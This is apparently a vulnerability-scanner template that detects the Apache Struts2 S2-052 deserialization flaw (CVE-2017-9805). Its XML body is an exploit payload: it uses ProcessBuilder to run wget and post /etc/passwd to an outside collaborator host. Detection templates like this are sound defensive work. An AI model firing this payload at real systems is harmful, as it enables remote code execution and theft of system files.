id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.10 cve-id: CVE-2017-9805 cwe-id: CWE-502 requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start

asdasd asdasd false 0 0 false false 0 matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500